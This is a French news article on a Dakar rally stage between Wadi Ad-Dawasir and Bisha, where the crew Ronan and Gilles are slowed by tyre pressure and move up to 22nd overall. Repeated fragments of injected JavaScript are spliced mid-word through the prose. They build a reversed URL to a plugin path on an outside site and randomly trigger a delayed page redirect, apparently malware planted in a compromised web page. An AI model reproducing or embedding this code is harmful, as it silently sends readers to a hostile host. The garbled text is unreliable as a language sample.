Gênés par un problème de pression des pneus, Ronan et Gilles n’ont pas pu s’exprimer pleinement ce mercredi même s’ils passent de la 24e à la 22e place au général. Il reste une « dernière grosse étape » dixit le pilote pour retrouver le plaisir de conduire et tenter de reprendre quelques places au classement général.

Décidément, la vérité d’un jour n’est jamais celle du lendemain au Dakar. Et même lorsqu’on est aussi habitués à l’épreuve que Ronan et Gilles, même lorsqu’on sait que les certitudes sont rares dès que l’on monte dans la voiture, il y a l’envie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours intacte que la journée soit belle. Ce mercredi, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout au long des 759 km parcourus entre Wadi Ad-Dawasir et Bisha, dont 375 km de spéciale, le plaisir n’était pas vraiment au rendez-vous. Mais comme toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours, le pilote et le copilote n’ont pas peur de le reconnaître, en attendant impatiemment la suite.

Les voitures ont souffert

« Le terrain était identique à la veille avec peu de dunes mais plus de la moitié de la spéciale sur du sable, assez mou », explique Ronan. Sauf qu’au départ, le duo est « parti avec une pression un peu forte ». Conséquence : l’impossibilité de « lancer la voiture » et de « la faire suffisamment planer ». « On est parti avec plus de 2 kg de pression à froid ce matin et par rapport aux buggys, il fallait mettre un peu moins ». Gilles et Ronan assurent « avoir subi » le scénario de la course et « ne pas avoir pris beaucoup de plaisir ».

Heureusement, l’étape étant particulièrement rapide, les difficultés rares, « on est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous dans le même rythme ». Les écarts sont en effet très faibles à l’arrivée. Alors qu’ils terminent à la 30e position, à 20 min 11 sec du vainqueur du jour, Stéphane Peterhansel (Audi), les 17 concurrents précédents se tiennent en 10 minutes. Les voitures ont souffert en cette journée, la faute à ses oueds sablonneux qui composaient la deuxième partie de la spéciale. « Il y avait de la végétation, les arbres ont frotté et les carrosseries ont été toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touchées »

À l’issue de la journée, il reste néanmoins la satisfaction « d’avoir grappillé deux places au classement général ». Désormais 22e, ils accusent un peu plus d’une demi-heure de retard sur le 20e, leur coéquipier argentin Lucio Alvarez. Forcément, les regards sont déjà portés sur la prochaine étape. Il y aura 501 km au toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}total à parcourir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour de Bisha avec 346 km de spéciale et un terrain plutôt semblable. « On partira avec des réglages légèrement différents », assure Ronan. « Demain, on sera les chasseurs, sourit-il. Ce sera la dernière grosse étape avec de la navigation. On espère qu’elle sera plus animée qu’aujourd’hui ! »